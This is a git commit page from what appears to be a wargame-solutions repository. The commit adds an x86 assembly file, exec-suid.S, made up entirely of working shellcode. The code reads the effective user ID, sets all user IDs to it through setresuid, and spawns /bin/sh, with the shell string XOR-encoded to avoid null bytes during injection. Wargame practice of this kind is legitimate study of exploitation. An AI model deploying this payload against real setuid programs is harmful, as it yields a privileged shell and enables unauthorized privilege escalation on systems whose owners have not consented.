diff options
author | Iru Cai <mytbk920423@gmail.com> | 2018-10-05 17:41:48 +0800 |
---|---|---|
committer | Iru Cai <mytbk920423@gmail.com> | 2018-10-05 17:41:48 +0800 |
commit | 62d1287693cbb282570c52f44bfcc0be0e590d7f (patch) | |
tree | 92261652f6ae3a139a8c36bdf0caf3182ed79c51 /shellcode/exec-suid.S | |
download | iogame-62d1287693cbb282570c52f44bfcc0be0e590d7f.tar.xz |
level 1~7, shellcode
Diffstat (limited to 'shellcode/exec-suid.S')
-rw-r--r-- | shellcode/exec-suid.S | 21 |
1 files changed, 21 insertions, 0 deletions
diff --git a/shellcode/exec-suid.S b/shellcode/exec-suid.S new file mode 100644 index 0000000..94ec68a --- /dev/null +++ b/shellcode/exec-suid.S @@ -0,0 +1,21 @@ +.global _start +_start: + xorl %eax, %eax + addb $201, %al # geteuid + int $0x80 + movl %eax, %ebx + movl %eax, %ecx + movl %eax, %edx + xorl %eax, %eax + addb $208, %al # setresuid + int $0x80 + xorl %eax, %eax + addb $11, %al + movl $0x3058431f, %ebx + xorl $0x30303030, %ebx # "/sh\0" + pushl %ebx + pushl $0x6e69622f # "/bin" + movl %esp, %ebx + xorl %ecx, %ecx + xorl %edx, %edx + int $0x80 |